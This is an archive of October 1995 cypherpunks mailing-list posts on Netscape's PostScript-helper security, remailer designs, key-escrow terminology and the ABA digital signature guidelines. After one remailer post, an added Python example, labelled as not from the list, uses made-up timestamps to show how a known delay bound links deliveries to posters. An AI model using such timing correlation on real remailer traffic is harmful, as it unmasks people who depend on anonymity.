>>Precedence: bulk
>
>>Can someone please show me the ropes on becoming a cypherpunk!!!! Thanxs.
>
>     Me Too, I'm catching on but some help would help !
      ^^^^^^

Looks like this is now a proper noun, thanks to AOL.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 04:26:43 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Netscape whining virus
In-Reply-To: <Pine.HPP.3.91.951018103637.23762A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9510180740.A37215-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, Mats Bergstrom wrote:

> You don't seem to understand the issue here. Netscape with JAVA is
> supposed to become more or less the 'only' program you will run,
> a kind of superimposed operative system, or your main shell for
> running 'everything' from. Much of 'everything' will be downloaded
> at the time of execution. (Microsoft is supposed to be reduced to
> one of several 'kernel-suppliers' only.) And 'infected PCs' really
> *are* a very big deal in corporate and institutional surroundings.

I understand this exactly, I face my university's restricting account 
security measures and virus paranoia every time I log in.

And I'm all for component ware becoming a reality. It's just that
some of last week's java screaming seemed a bit shrill. What doesn't seem
a "big deal" to me is that the security problems of the past also apply 
to Java. It's not that it's irrelevant, it's that it's obvious. The 
internet worm, as far as I know, was written in C (and some vax asm?).
I'm just saying, "yeah, so what else is new?",  "secure" software has holes.

I'm happy someone's trying to give some thought to language security 
during the design phase (no matter how ineffective, Perry).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 07:38:42 PDT
To: cypherpunks@toad.com
Subject: Re: I want to learn!
Message-ID: <199510181437.HAA00477@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>>From: VINCENT810@aol.com
>>Can someone please show me the ropes on becoming a cypherpunk!!!! Thanxs.
>     Me Too, I'm catching on but some help would help !
>     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu

Okay, places to start.

Go to the cypherpunks ftp site ftp.csua.berkeley.edu/pub/cypherpunks
and look around.  TCMay's "Cyphernomicon" FAQ is a must, although
it's really really big.  It's been Weblinked somewhere, but I
fail to recall.  It's also been ZIPped somewhere.

Buy Bruce Scheiner's (sp?) "Applied Cryptography."  Actually,
don't.  A new Second Edition is coming out next month.

Read the list, hopefully not posting lame newbie messages
like "I want to learn how to be a cypherpunk!!!!"

Smile.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 04:40:47 PDT
To: David Murray <sdavidm@iconz.co.nz>
Subject: Re: transaction costs in anonymous markets
In-Reply-To: <pnr096593132l@iconz.co.nz>
Message-ID: <Pine.3.89.9510180711.B37215-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, David Murray wrote:

> B. Unilateral Anonymity. One party to the transaction is known, but the other
> is unknowable. An example might be subscribing for a digital security with
> ecash - the issuer is known, but the purchaser is anonymous.
> 
> C. Bilateral Anonymity. The identities of both parties to the transaction
> are unknowable. This might be the case on a cypherpunk stock exchange...

Or we could use the client/server terminology when possible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 04:59:14 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Postscript in Netscape
In-Reply-To: <3084DD5B.4AD1@netscape.com>
Message-ID: <9510181156.AA11525@all.net>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein - Electronic Munitions Specialist Wrote:

...
>   If a user configures a postscript viewer that has not had the
> file operations disabled as a helper app to any web browser then
> they are opening themselves up for a world of hurt.  The same is
> true if they just download the file and run their viewer on it
> manually.  The same is true if they configure /bin/sh as an
> external viewer.
> 
>   Obviously everyone should heed perry's warnings and emasculate
> their postscript interpreters before using them to view files
> of unknown origin.

WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
be secure - regardless of the user's use of their product.  Otherwise,
the ads should read:

	"Netscape can be used securely by sufficiently knowledgeable
	users who have emasculated their postscript interpreters before
	using them to view files of unknown origin, and who have removed
	all other known, unknown, and/or undisclosed security holes from
	their systems.  Otherwise, Netscape is insecure and should not be
	trusted."

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob.Lowry@on-ramp.ior.com (Rob Lowry)
Date: Wed, 18 Oct 95 07:58:12 PDT
To: Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu
Subject: Re: I want to learn!
Message-ID: <m0t5ZwP-000RomC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


>     
>>Can someone please show me the ropes on becoming a cypherpunk!!!! Thanxs.
>     
>     Me Too, I'm catching on but some help would help !
>     
>     
>     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu



 1) Read the FAQ (sorry.. don't have the address for it handy.. Tim, ya
    got it?<g>)
 2) Read up on crypto, politics and economics.. mighty dry reading for
    most, but damn useful around here.
 3) Practice safe encryption- Use PGP or any other encryption you are
    comfortable with. But be sure to always use it. (Wrap that data)
 4) Develop a strong urge for privacy and then strongly fight to protect
    it. This means you may have to write letters to Congress and the
    Senate, may have to defend yourself to non-crypto orientated folks,
    and so on..
 5) Practice what you preach, and preach what you practice. Share the
    knowledge with anyone who is interested..
 6) Send $10.50 to me for the genuine 'Cypherpunks Starter kit' which
    includes a cheat sheet of really cool Jargon, a pair of black
    sunglasses, and high quality laser reprints of the FAQ..
    mail that to: Cypherpunk
                  PO Box 288
                  Rockford, Wa 99030
<g> RobL

------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 18 Oct 95 08:02:42 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <Pine.3.89.9510172053.A73291-0100000@aix2.uottawa.ca>
Message-ID: <199510181204.IAA01662@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone said:
> > Some enterprising cypherpunks can buy a bunch and resell 'em for cash.
> > 
> And then sell the serial address for cash.

CypherChip Party. Pick up one chip from pile and leave one chip, or
leave $$.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob.Lowry@on-ramp.ior.com (Rob Lowry)
Date: Wed, 18 Oct 95 08:11:22 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Postscript in Netscape
Message-ID: <m0t5a8t-000RomC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>>   Obviously everyone should heed perry's warnings and emasculate
>> their postscript interpreters before using them to view files
>> of unknown origin.
>
>WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
>be secure - regardless of the user's use of their product.  Otherwise,
>the ads should read:
>
>	"Netscape can be used securely by sufficiently knowledgeable
>	users who have emasculated their postscript interpreters before
[SNIP]


I have to disagree here.. There is such a thing as overstating the obvious.
And a statement such as the one you propose is definitely in that range. If
the user is knowledgeable about system ops that come from external apps,
such as the PS interpreters, Java or whatever, then they should take
appropriate security measures themselves. If they are not skilled or versed
in such subjects, you can bet they will be after the first incident of
'cyber-vandalism'. Ignorance is not bliss, and you, and only you, are
responsible for protecting yourself in 'cyberspace'.

Heck, I can see it now:
        "Sex can be used by sufficiently knowledgeable
        users who have educated their partners before
        using them to attempt comply to acts of contortion,
        sustained physical activity, voluntary dehydration,
        and who have removed all other known, unknown, and/or
        undisclosed partners from their systems.  Otherwise,
        sex is unsafe and should not be attempted."

Again, overstating the obvious...

RobL
------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Wed, 18 Oct 95 06:32:09 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape PR
Message-ID: <m0t5Ya3-00053JC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

> 
>   If you wish to get an official statement from Netscape, you should
> contact our PR department.  Their number is 415-528-2802.
> 

They don't have e-mail?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 05:35:41 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Postscript in Netscape
In-Reply-To: <3084F191.56FE@netscape.com>
Message-ID: <9510181233.AA12939@all.net>
MIME-Version: 1.0
Content-Type: text


> > WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> > be secure - regardless of the user's use of their product.  Otherwise,
> > the ads should read:
> > 
> >         "Netscape can be used securely by sufficiently knowledgeable
> >         users who have emasculated their postscript interpreters before
> >         using them to view files of unknown origin, and who have removed
> >         all other known, unknown, and/or undisclosed security holes from
> >         their systems.  Otherwise, Netscape is insecure and should not be
> >         trusted."
> 
>   Why did I know you would be showing up in this discussion?  You
> wouldn't be related to alice de 'nonymous would you?

Is it Netscape's position that when people call them on their statements
they make irrelevant comments and inflammatory remarks toward legitimate
researchers who are freely helping them understand the security issues
they apparently don't understand?

>   I don't believe that Netscape claims to be some magic bullet that
> will suddenly make your system secure when you install it.  We also
> don't claim that it will detect viruses.

You claim that you provide secure net access for the purposes of
transactions - which you don't - and you have gotten an enormous amount
of money from people who don't understand these issues based, at least
in part, on your false claims.  Some people might interpret that as fraud.

Now instead of trying to insult and put down people who have legitimate
security concerns, you personally attack individuals, try to redirect the
discussion away from the security flaws in Netscape, and try to hush the
discussion with:

>   Don't you think we've wasted enough bandwidth on this?  I'm sure
> most readers of this list are sick of it by now.

I think that you should give a copy of this and the other messages on
this topic to someone at Netscape who is responsible for protection and
ask them to speak for the company and address these issues head on. 
Regardless of your disclaimer, when you speak on the net, we hear
Netscape, and the sounds are starting to sound more and more like
Microsoft to me.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 08:41:38 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Postscript in Netscape
In-Reply-To: <3084F191.56FE@netscape.com>
Message-ID: <199510181536.IAA24732@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> > be secure - regardless of the user's use of their product.  Otherwise,
> > the ads should read:
> > 
> >         "Netscape can be used securely by sufficiently knowledgeable
> >         users who have emasculated their postscript interpreters before
> >         using them to view files of unknown origin, and who have removed
> >         all other known, unknown, and/or undisclosed security holes from
> >         their systems.  Otherwise, Netscape is insecure and should not be
> >         trusted."

	That's bullshit. Netscape can't control every user's entire
environment. It's Netscape's job to produce a secure product. If the
users of said product decide to shoot themselves in the foot by
configuring it insecurely that is their problem. It is in Netscape's
best interest to make it difficult to configure insecurely, but
impossible to prevent.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Wed, 18 Oct 95 06:46:41 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181156.AA11525@all.net>
Message-ID: <Pine.BSD.3.91.951018082550.22548B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:

> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:
>
That just doesn't make all that much sense.  "regardless of the user's use 
of their product"?  Sure, like PGP should be considered insecure software 
because as a user I could use it on an ISP, and make my passwd two 
characters long and leave it set as an environment variable in the shell 
for the pre-mail script I have.  
 
> 	"Netscape can be used securely by sufficiently knowledgeable
> 	users who have emasculated their postscript interpreters before
> 	using them to view files of unknown origin, and who have removed
> 	all other known, unknown, and/or undisclosed security holes from
> 	their systems.  Otherwise, Netscape is insecure and should not be
> 	trusted."

No, otherwise the postscript viewer is insecure.  Netscape is not 
handling the postscript code, just passing it along.  It does not come 
with an application for postscript automagically setup for the user so 
you can't blame it for spawning an application without the user's 
knowledge.  Maybe there should (or is there already) be a note in the docs 
mentioning this, but of all the regular users I know, none of them read 
documentation.  To expect a system to call itself insecure because the 
user is stupid and invites evil in doesn't make much sense.  So I guess 
Java can NEVER be secure because if I want I can enable native calls and 
all the file access classes and other dangerous stuff for any application 
I want to and shut down all the inbuilt security.  It's Sun's fault that 
I'm dumb as a brick wall?

Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 08:45:23 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <199510181539.IAA24928@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Regardless of your disclaimer, when you speak on the net, we hear
> Netscape, and the sounds are starting to sound more and more like
> Microsoft to me.


	Speak for yourself. When Jeff posts, I hear (fancy that!)
Jeff.

	In any case, it might be wise for Jeff to get a non-netscape
account to do his cypherpunks posting from, so as to avoid
confusion. (ObPlug: Community ConneXion offers mailboxes for just
$5/month -- shell accounts for $7.50 ;-)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Wed, 18 Oct 95 05:47:20 PDT
To: Modemac <modemac@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510181244.IAA03196@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:58 10.18.1995 -0700, Modemac wrote:
>     1) A person writes a message and encrypts it with PGP.

Using a set public key?  Which would mean the remailers all share the same
pub/pri key pair (or pieces thereof)?  You'll have to come up with a good
way of maintaining this secret, since if you're not careful it could be
compromised by something as simple as an attacker's trying to attach a new
remailer to the remailer group or physically attack any existing remailer.

>     2) That person then posts his message to the "anonymous messages"
>        newsgroup.
>     3) A remailer scanning the newsgroup picks up the message,
>        decrypts it, strips the headers and makes it anonymous, and
>        sends it to its destination.

Not only is the anonymity of the entire traffic load compromised if the
single shared private key is compromised, but even if the secret is kept the
newsgroup articles' headers being posted in the clear still opens this
scheme to traffic analysis (even if you put in a short random remailer
delay, as you say later on; computers are very good at sifting through large
volumes of data to find this kind of pattern, especially if the remailer
delay's upper bound is known (you proposed two hours)).

>The actual remailer code, involving scanning the newsgroup for
>PGP-encrypted messages and stripping headers, could be written with
>PERL scripts.  This would keep it portable, and it would be easy for 
>a person to tell if it has been tampered with.  This code would be
>distributed widely.

...and if someone installs their own remailer and adds it to the group, and
therefore it must get the complete shared private key at some point (of
necessity, else it couldn't decrypt the messages), and then the attacker can
just look at the key and decrypt all traffic...?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019
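
[Added example, not part of Herb Sutter's message or of any code posted to
the list.  It measures the point made above about a known upper bound on
the remailer delay: with cleartext article headers, each delivery can only
have come from an article posted inside that window.  The poster names,
timestamps, function names and the one-article-per-poster rule are
assumptions made for the illustration; only the two-hour bound comes from
the thread.]

```python
from datetime import datetime, timedelta

MAX_DELAY = timedelta(hours=2)  # upper bound on remailer delay proposed in the thread

# Constructed sample data (assumption): who posted an encrypted article to the
# newsgroup and when. Article headers are in the clear, so every reader sees this.
POSTS = [
    ("alice", "1995-10-18 08:00"),
    ("bob",   "1995-10-18 08:40"),
    ("carol", "1995-10-18 11:30"),
    ("dave",  "1995-10-18 15:00"),
]

# Constructed sample data (assumption): when the remailer sent each
# anonymized message on to its destination.
DELIVERIES = [
    ("msg-1", "1995-10-18 09:10"),
    ("msg-2", "1995-10-18 10:20"),
    ("msg-3", "1995-10-18 12:05"),
    ("msg-4", "1995-10-18 16:45"),
]


def _ts(text):
    """Parse the timestamp format used in the sample data."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M")


def candidate_sets(posts, deliveries, max_delay):
    """Map each delivery to the posters whose article appeared at most
    max_delay before it. This set is the delivery's anonymity set."""
    result = {}
    for msg, sent in deliveries:
        sent_at = _ts(sent)
        result[msg] = {
            poster
            for poster, posted in posts
            if timedelta(0) <= sent_at - _ts(posted) <= max_delay
        }
    return result


def eliminate(sets):
    """Shrink the sets using the assumption that each poster sent exactly one
    article: a poster pinned to one delivery cannot explain any other.
    Only singleton propagation is done, so the result is an upper bound on
    the anonymity a fuller matching analysis would leave."""
    sets = {msg: set(s) for msg, s in sets.items()}
    changed = True
    while changed:
        changed = False
        for msg, s in sets.items():
            if len(s) != 1:
                continue
            (only,) = s
            for other, t in sets.items():
                if other != msg and only in t:
                    t.discard(only)
                    changed = True
    return sets


def linked(sets):
    """Number of deliveries whose anonymity set has collapsed to one poster."""
    return sum(1 for s in sets.values() if len(s) == 1)


if __name__ == "__main__":
    for bound in (MAX_DELAY, timedelta(hours=12)):
        final = eliminate(candidate_sets(POSTS, DELIVERIES, bound))
        print(f"delay bound {bound}: {linked(final)} of {len(final)} linked")
        for msg, s in sorted(final.items()):
            print(f"  {msg}: {sorted(s)}")
```

[At this traffic level the two-hour bound leaves every delivery with a
single possible poster, while a twelve-hour bound leaves none pinned down
by this simple pass; the anonymity set depends on how many articles fall
inside the window, not on the encryption.]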





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Wed, 18 Oct 95 06:53:43 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <Pine.BSD.3.91.951018083946.22548C-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:

> Is it Netscape's position that when people call them on their statements
> they make irrelevant comments and inflammatory remarks toward legitimate
> researchers who are freely helping them understand the security issues
> they apparently don't understand?
> 
Jeff doesn't speak directly for Netscape, Doc.  Your previous suggestion 
didn't make much sense, the idea that a single piece of software must 
close ALL the holes across the board to be called "secure" is ludicrous.  
Granted it should cover all within its domain, and provide safeguards, 
but to expect Netscape to handle security problems that rightfully should 
be fixed in the TCP/IP protocol stack, or in the interpreter for another 
language that happens to have a security hole and can be spawned off.  
Netscape does not come with a postscript app preset so the user has to 
make a conscious choice.  All postscript viewers I have used make mention 
of these security problems, and I would hope (tho do not for one second 
believe) that users read these warnings.  If they don't and set up the 
browser to spawn off files of unknown origins, then they are taking their 
own risks and I do not think for one second netscape could be held 
responsible.  There is no defense against the dreaded DEU hole that 
exists on all systems.




Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Horgan <patrick@Verity.COM>
Date: Wed, 18 Oct 95 09:03:04 PDT
To: cypherpunks@toad.com
Subject: Digital Signature Guidelines
Message-ID: <30852451.45E4@verity.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems that your embedded viewer doesn't want to work on my
UNIX box.  It makes it quite hard to comment on your
guidelines.  Apparently, from the way you're presenting this you
have no real desire to get any industry consensus.  Perhaps you
only want people that use Windows to have an opportunity to comment.
Mac users and Unix users not welcome.  I find the whole need to 
have yet another viewer annoying.  Haven't you guys heard of 
industry standards?

Annoyed,

Patrick J. Horgan
-- 
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Oct 95 09:38:06 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <9510181554.AA05280@toad.com>
Message-ID: <199510181636.JAA17879@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:

>If you
>split the message into shadows, you avoid having anyone in this
>position.

I think splitting the message would be OK, but then the question is who
is responsible for reassembling it?  If there were a "reassembly
server" which took such messages, assembled them, and forwarded them,
then we would be right back where we started from.  If the end user is
responsible for reassembly, then that is tantamount to voluntarily
agreeing to receive anonymous messages, and that is no problem.  The
complaints we get are virtually 100% from people who didn't want to
receive such messages, or see them posted.  And of course anonymous news
postings via shadows would also have the reassembly problem.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 18 Oct 95 09:38:17 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <Pine.SOL.3.91.951018092256.1621B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:
> 
> You claim that you provide secure net access for the purposes of
> transactions - which you don't - and you have gotten an enormous amount
> of money from people who don't understand these issues based, at least
> in part, on your false claims.  Some people might interpret that as fraud.
> 

Well, assuming that US law follows british practice in this regard, it
would seem that those people would be wrong- to prove fraud, you would
need to show intent to commit fraud, and it's been obvious for a long long
time that Netscape's security holes are the result of lack of experience
rather than malice of any kind. Would you have a security expert write
your graphics engine? 

Microsoft is the Evil Empire; Netscape is  a Naughty Principality. 

Simon

 ----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Oct 95 09:43:43 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <v02120d02acaa97afa587@DialupEudora>
Message-ID: <199510181642.JAA18712@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tbyfield@panix.com (t byfield) writes:

>        Well, when some folks want to circumvent this kind of last-link
>accountability (even if they are the _only_ link), they simply forge their
>headers--so why not incorporate that tactic into the remailer net?

I think a remailer which forged headers would get people even angrier
than one which was up front about what it was doing.  Forging headers is
really considered antisocial by a lot of people on the net.  If you could
do it safely, you wouldn't need remailers.  Since you need them, it's not
safe, hence the message will probably get traced back to the remailer.
This is prima facie evidence to get an account yanked at a lot of places.

>        Also, maybe apropos...It seems to me that there should be a way,
>within the remailer net, to synthesize forged-path strings with the "Human
>ID through insecure channel" remarks you made a few days ago.

The "human ID" thing requires a shared secret at both ends, which isn't
generally practical between a customer and a remailer.  Also, it was
specific to the needs of human minds; if you have a computer and a shared
secret you do a lot better to use DES or IDEA (and let the shared secret
be the key), and even without a shared secret you can use public key
techniques for identification and authentication.  So I don't think the
human ID approach would be relevant here.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Willis H. Ware" <willis@rand.org>
Date: Wed, 18 Oct 95 10:03:53 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: YOUR chat with Goeff Greiveldinger
Message-ID: <199510181703.KAA29941@conrad.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Michael:

Your message was forwarded to me and I presume to address this mail
list although I would normally not.

If you still have time for adjustments to your talk, let me call your
attention to what I believe to be an awkward semantic ambiguity in the
current dialogue about encryption.  I quizzed a few people about usage
of "escrow" and "key escrow" so I have some confidence that the
following facts and argument are valid.

The term "escrow", in the context of cryptography, was introduced by
the so-called Clipper Initiative in the United States, April 1993.  It
had not previously been associated with cryptography.

As initially used in association with Clipper, escrow implies [1] a
chip-unique key (equivalent to a chip-unique master-key) used only for
law enforcement access, [2] splitting of the chip key into parts held
by [3] extra-organization trusted third parties, [4] automatic
inclusion of the chip key with every use of the encryption but [5]
protected with yet another secret key embedded in the encryption chip
which is itself [6] protected against reverse engineering or external
access to its details.  The concept, at the time of its introduction,
was oriented solely to communications intercept and hence, [7] a "law
enforcement access field" would be a required part of every
transmission.  The LEAF contains chip identity which in turn allows
law enforcement to solicit components of the master key from escrow
agents, then to recover the session key and eventually the encrypted
traffic.

NOTE first that this use of the word violates the common legal usage in
which the parties who deposit material with an "escrow agent"
themselves have access to it at some point. In the Clipper use, the
parties obviously do not have access to what the escrow agencies hold.

Subsequently the concept of mimicking the hardware-based Clipper
approach in software arose, and the term "commercial key escrow" was
applied to it.  Some of the details are the same as Clipper; in
particular, something is to be held by trusted third parties which, in
some proposals, are called Data Recovery Centers.  Some proposals plan
to replicate Clipper by depositing split master keys with trusted
third parties; law enforcement with proper authorization can acquire
the parts of the master key, deduce the actual key used for a given
transmission (i.e., the session key) and so decrypt the traffic.
Other proposals depart from Clipper and plan to store split (or not)
actual session keys with the trusted agents.

NOTE that the observation above that using escrow in the context of
encryption by Clipper violates legal usage is generally invalid for
commercial key escrow.  The party which deposits keys with a Data
Recovery Center obviously can have access to them.

Inevitably, the concept was extended further to include the possibility
that corporations could retain the keys internally in a specially
trusted part of the organization.  Legal entities, such as
corporations, would be subject to extant procedures of the law
enforcement court order or subpoenas to provide the keys under
authorized circumstances.  As to be expected, such intra-
organizational protective retention of keys was called by some
escrow, or by others self-escrow.  However, the departure from Clipper
was even more extensive because:

    o There is probably no need for splitting such keys,

    o There probably would be no need for a complex master-key
     approach such as embodied in Clipper, and

    o There might not need to be a "law enforcement access field" in
     externally transmitted messages.

As so often is the case in computer-related matters, the terminology
is not clearly established.  One way to clarify it would be:

     [A] To confine the term "escrow" to situations in which some key,
     split or not, master or session, will be stored with
     extra-organizational trusted parties who make keys available only
     to law enforcement; but

     [B] For the intra-organizational situation or the
     extra-organizational situation in which the depositing party can
     have access to the keys, adopt the term "archive" or "key
     archive".

     The term "key backup" might be used in the image of conventional
     backups of data bases and files; but the term "archive" or "key
     archive" would hopefully avoid confusion.

If one were to follow this taxonomy, then "Commercial Key Escrow",
should be called "Commercial Key Archive" and the process of depositing
keys therein should be called "key archiving."

I would not stand strongly for picking "archive" as an appropriate
term but something different from "escrow" is clearly needed to keep
the dialogue leading to a national crypto-policy precise, unambiguous,
and clean.

Obviously it's your call whether you choose to adopt these semantic
views in your conversations with Geof.  At minimum, you should be alert
to loose usage of "escrow" as a concept.

					Willis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 18 Oct 95 07:23:36 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: ABA Draft Digital Signature Guidelines Open for Comment
Message-ID: <Pine.SUN.3.91.951018095008.14293E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


The long-delayed ABA draft digital signature guidelines are now available 
for public comment.  This is potentially an important document, and is 
worth some time for those interested in the legal and economic effects 
of digital signatures.  An internet version and more info can be found at:

http://www.intermarket.com/ecl/digsgleg.html

The comment period ends Nov 30, 1995, so don't delay.

Due to the ABA's Section on Science and Technology's fear that its
intellectual property will be ripped off, the document is in a strange
"read-only" format, relying on the "Common Ground Mini-Viewer".  The
program has been designed to prevent users from printing their own copy of
the document.  Paper copies can be ordered from the ABA for $15 (see
website for details). 

I would apologize on behalf of the ABA Information Security Committee for
this user-unfriendly method of distributing the document (it certainly
makes quoting from it in your comments difficult!), but the Chair of the
Committee, Michael Baum, unilaterally removed me from the Committee a few 
days ago.

I nonetheless urge you to read this interesting document. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.







